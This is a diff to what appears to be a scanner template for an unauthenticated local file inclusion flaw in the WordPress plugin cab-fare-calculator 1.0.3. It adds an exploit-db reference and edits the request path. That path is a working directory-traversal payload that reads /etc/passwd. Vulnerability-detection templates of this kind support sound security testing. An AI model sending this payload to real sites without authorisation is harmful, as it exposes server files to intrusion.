--- a/vulnerabilities/wordpress/cab-fare-calculator-lfi.yaml
+++ b/vulnerabilities/wordpress/cab-fare-calculator-lfi.yaml
@@ -4,13 +4,13 @@ info:
   name: WordPress Plugin cab-fare-calculator 1.0.3 - Local File Inclusion - Unauthenticated
   author: Hassan Khan Yusufzai - Splint3r7
   severity: high
-  reference: 
+  reference: https://www.exploit-db.com/exploits/50844
   tags: wordpress,wp-plugin,lfi,wp
 
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}/wp-content/plugins/cab-fare-calculator/tblight.php?controller=../../../../../../../../../../../etc/passwd%00&action=1&ajax=1'
+      - '{{BaseURL}}/wp-content/plugins/cab-fare-calculator/tblight.php?controller=../../../../../../../../../../../etc/passwd&action=1&ajax=1'
 
     matchers-condition: and
     matchers:
